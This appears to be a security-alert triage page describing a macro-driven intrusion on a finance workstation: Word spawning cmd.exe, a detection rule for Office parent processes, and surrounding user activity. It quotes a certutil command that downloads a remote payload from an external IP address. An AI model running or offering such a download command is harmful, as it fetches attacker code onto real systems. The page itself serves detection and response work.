Triage queue
// Operations

Word spawned a shell that downloaded a remote payload

winword.exe created cmd.exe on WS-FIN-004, which used certutil to retrieve u.dat from 45.61.136.14 and registered it as a recurring scheduled task.

ALT-D6DD3DHighNew
78Elevated

Any event where parentProcess is one of winword.exe, excel.exe, outlook.exe, powerpnt.exe

A document application starting a shell or scripting host. Word does not legitimately need to launch PowerShell, so this is near-always macro execution.

Triggering event

The exact record that satisfied the rule.

Process ExecutionHigh2026-09-04 17:45:29ZCrowdStrike Falcon
winword.exe spawned cmd.exe which invoked certutil to retrieve a remote file
cmd.exe /c certutil -urlcache -split -f http://45.61.136.14/u.dat %TEMP%\u.dat

What else was happening

Other activity for ekowalski in the surrounding hour.

TimeEventSeverityHost
2026-09-04 17:24:11ZAuthentication FailureLowWS-FIN-007
2026-09-04 17:46:09ZNetwork AllowMedium
2026-09-04 17:47:04ZPersistence CreatedHighWS-FIN-004
2026-09-04 17:52:54ZAuthentication FailureLowWS-FIN-004
2026-09-04 18:02:03ZAuthentication SuccessInfoWS-FIN-012
2026-09-04 18:26:22ZAuthentication SuccessInfoWS-FIN-004

Alert

Raised
7d ago
Last updated
7d ago
Risk score
78
Source
CrowdStrike Falcon
Detected by
Correlation rule

Entity risk

68Elevated

ekowalski carries a standing risk score derived from all of its activity, not just this alert.

Open the entity profile

Pivot